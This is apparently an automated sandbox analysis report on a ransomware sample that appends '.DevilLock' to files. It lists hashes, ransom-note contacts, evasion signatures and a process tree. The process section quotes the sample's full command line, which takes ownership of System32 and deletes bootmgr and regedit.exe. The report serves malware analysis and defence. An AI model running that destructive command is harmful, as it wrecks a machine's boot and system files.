Analysis
- max time kernel: 97s
- max time network: 47s
- platform: windows7_x64
- resource: win7-20220414-en
- submitted: 26-06-2022 02:01
Static task: static1
Behavioral task: behavioral1
Sample: 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe
Resource: win7-20220414-en
General
- Target: 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe
- Size: 3.1MB
- MD5: 6a85d0ba4d1db63d390b7a071d60e0ef
- SHA1: 79a32ee067e19b43bc3f29fde3a3ff95986f8e2e
- SHA256: 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412
- SHA512: 16a97e39d6a373c3eb7140c93fd61afd12a7569d262ee67a47ac548cffc5735379dee85ba68dabb9a0aa768e5505fe6a451fd08aae68006aa1962b2861c8a6ce
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\HOW-TO-DECRYPT.TXT
CobraLocker@mail2tor.com
http://mail2tor2zyjdctd.onion/
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
- Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ (process: 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe)
Disables Task Manager via registry modification
-
Modifies extensions of user files 3 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
- File renamed C:\Users\Admin\Pictures\MeasureRestart.crw => C:\Users\Admin\Pictures\MeasureRestart.crw.DevilLock (process: 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe)
- File renamed C:\Users\Admin\Pictures\RegisterDisable.crw => C:\Users\Admin\Pictures\RegisterDisable.crw.DevilLock (process: 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe)
- File renamed C:\Users\Admin\Pictures\SplitPush.png => C:\Users\Admin\Pictures\SplitPush.png.DevilLock (process: 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe)
Possible privilege escalation attempt 5 IoCs
Processes:
- PID 1520 icacls.exe
- PID 844 takeown.exe
- PID 1804 icacls.exe
- PID 396 takeown.exe
- PID 2008 takeown.exe
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion (process: 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (process: 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe)
Modifies file permissions 1 TTPs 5 IoCs
Processes:
- PID 844 takeown.exe
- PID 1804 icacls.exe
- PID 396 takeown.exe
- PID 2008 takeown.exe
- PID 1520 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
- resource behavioral1/memory/1192-57-0x0000000001130000-0x0000000001960000-memory.dmp, yara_rule themida
- resource behavioral1/memory/1192-58-0x0000000001130000-0x0000000001960000-memory.dmp, yara_rule themida
-
Checks whether UAC is enabled
Processes:
- Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (process: 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe)
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
- PID 1192 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
- Token: SeDebugPrivilege, PID 1192, 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe
- Token: SeDebugPrivilege, PID 1192, 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe
- Token: SeTakeOwnershipPrivilege, PID 2008, takeown.exe
- Token: SeTakeOwnershipPrivilege, PID 844, takeown.exe
- Token: SeTakeOwnershipPrivilege, PID 396, takeown.exe
Suspicious use of WriteProcessMemory 24 IoCs
Processes:
- PID 1192 (369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe) wrote to memory of PID 1524 (cmd.exe)
- PID 1192 (369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe) wrote to memory of PID 1524 (cmd.exe)
- PID 1192 (369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe) wrote to memory of PID 1524 (cmd.exe)
- PID 1192 (369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe) wrote to memory of PID 1524 (cmd.exe)
- PID 1524 (cmd.exe) wrote to memory of PID 2008 (takeown.exe)
- PID 1524 (cmd.exe) wrote to memory of PID 2008 (takeown.exe)
- PID 1524 (cmd.exe) wrote to memory of PID 2008 (takeown.exe)
- PID 1524 (cmd.exe) wrote to memory of PID 2008 (takeown.exe)
- PID 1524 (cmd.exe) wrote to memory of PID 1520 (icacls.exe)
- PID 1524 (cmd.exe) wrote to memory of PID 1520 (icacls.exe)
- PID 1524 (cmd.exe) wrote to memory of PID 1520 (icacls.exe)
- PID 1524 (cmd.exe) wrote to memory of PID 1520 (icacls.exe)
- PID 1524 (cmd.exe) wrote to memory of PID 844 (takeown.exe)
- PID 1524 (cmd.exe) wrote to memory of PID 844 (takeown.exe)
- PID 1524 (cmd.exe) wrote to memory of PID 844 (takeown.exe)
- PID 1524 (cmd.exe) wrote to memory of PID 844 (takeown.exe)
- PID 1524 (cmd.exe) wrote to memory of PID 1804 (icacls.exe)
- PID 1524 (cmd.exe) wrote to memory of PID 1804 (icacls.exe)
- PID 1524 (cmd.exe) wrote to memory of PID 1804 (icacls.exe)
- PID 1524 (cmd.exe) wrote to memory of PID 1804 (icacls.exe)
- PID 1524 (cmd.exe) wrote to memory of PID 396 (takeown.exe)
- PID 1524 (cmd.exe) wrote to memory of PID 396 (takeown.exe)
- PID 1524 (cmd.exe) wrote to memory of PID 396 (takeown.exe)
- PID 1524 (cmd.exe) wrote to memory of PID 396 (takeown.exe)
Processes
- C:\Users\Admin\AppData\Local\Temp\369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe"
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Modifies extensions of user files
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && takeown /f C:\Windows\regedit.exe && icacls C:\Windows\regedit.exe /grant %username%:F && del C:\Windows\regedit.exe && Exit
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\takeown.exe
      Command line: takeown /f C:\Windows\System32
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\icacls.exe
      Command line: icacls C:\Windows\System32 /grant Admin:F
      - Possible privilege escalation attempt
      - Modifies file permissions
    - C:\Windows\SysWOW64\takeown.exe
      Command line: takeown /f C:\Windows\System32\drivers
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\icacls.exe
      Command line: icacls C:\Windows\System32\drivers /grant Admin:F
      - Possible privilege escalation attempt
      - Modifies file permissions
    - C:\Windows\SysWOW64\takeown.exe
      Command line: takeown /f C:\Windows\System32\LogonUI.exe
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- memory/396-67-0x0000000000000000-mapping.dmp
- memory/844-65-0x0000000000000000-mapping.dmp
- memory/1192-54-0x00000000765C1000-0x00000000765C3000-memory.dmp (Filesize 8KB)
- memory/1192-57-0x0000000001130000-0x0000000001960000-memory.dmp (Filesize 8.2MB)
- memory/1192-58-0x0000000001130000-0x0000000001960000-memory.dmp (Filesize 8.2MB)
- memory/1192-59-0x0000000001130000-0x0000000001960000-memory.dmp (Filesize 8.2MB)
- memory/1192-60-0x0000000077B80000-0x0000000077D00000-memory.dmp (Filesize 1.5MB)
- memory/1192-61-0x0000000001130000-0x0000000001960000-memory.dmp (Filesize 8.2MB)
- memory/1520-64-0x0000000000000000-mapping.dmp
- memory/1524-62-0x0000000000000000-mapping.dmp
- memory/1804-66-0x0000000000000000-mapping.dmp
- memory/2008-63-0x0000000000000000-mapping.dmp